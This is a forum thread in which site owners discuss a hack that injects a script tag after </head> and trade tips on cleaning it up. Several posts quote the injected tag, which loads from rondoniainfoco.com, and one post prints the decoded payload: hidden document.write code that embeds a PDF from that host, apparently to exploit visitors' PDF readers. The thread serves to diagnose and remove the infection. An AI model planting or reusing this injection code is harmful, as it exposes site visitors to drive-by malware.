Hacked Site
- Started
- Last post
- 11 Responses
- BannedKappa
One of the site I've done was down this morning.
I checked it and found out it's been hacked.
Theres a script of code being placed in only when it's rendered.Even if I re-upload the original files this script is still in when I view source.
I've been in touch with the hosting company.
Anyone ever had this.The site is www.vintageprincess.com.au
and the script is being inserted just after the </head> tag
This is not in my upladed file.
<script src=http://rondoniainfoco.com/admin/indexd.php ></script>
- airey0
is it a wordpress or cms driven site? (i noticed there's a lot of FOOTER END style text in there is all)
- Amicus0
I'm not gonna touch that site until you've deloused it, and checked for crabs...
If you have a complete backup call up your hosting company and ask them to wipe the account and reset everything. It's a bitch, but unless you are a l33t hacker you might not find where they've put anything, and they will probably have made a back entrance to the site for themselves anyway.
- airey0
it looks like it's on every page which means it could be an htaccess style file, rewriting on the fly? then again, i have no fucking idea so i'm no help. sorry. let us know how you go!
- BannedKappa0
I I re-upload the entire site it still render that script in there...
- check the root directory of the domain for invisible files (specifically a .htaccess)airey
- version30
serverside for sure, your host sounds weak/vunerable
- Mojo0
I've seen a lot of exploits like this happen (esp wordpress) through xml rpc calls
- ESKEMA0
I see nothing on your link...
We were hacked a while back with something similar to what you described, but not in the header, managed to get rid of it the first time by cloning a part of the backend but after that they hacked another page that I couldn't resolve (I'm no programmer), talked to the programmer and he cleaned it...
- mydo0
been hacked before and got held to ransom!
be careful, always have strong passwords. and don't have pages that allow people to upload zip files.
to fix it, i just told my host they had a hacker in thier system and they well and truly fixed everything, increased my security, and ran new scans. all for free.which was nice.
- jackman0
Same problem with magento (ecommerce CMS), this line have been add :
<script src=http://rondoniainfoco.com/admin/indexd.php ></script>
it's writting a compressed javascript code in my page, this is te decompressed code :document.write("<div style=\"position:absolute;
left:-1000px;
top:-1000px;
\">");
document.write('<embed width=100 height=100
src="http://rondoniainfoco.com/admin/indexd.php?s=WviRDUq8&id=2"
type="application/pdf"></embed>');
document.write("</div>");So when you open the website, it's trying to start PDF reader but it can't. Error message : "sorry reader can't start it's core DLL's", or something like that.
- mydo0
- nescit0
Same thing happened to me - it turned out that the javascript.js and the mootools-release-XXX.js had been altered, so that every time the page accesed those files, it made another call to rodoniainfoco.com. Check the last lines of those two files and remove any links to rodoniainfoco.com.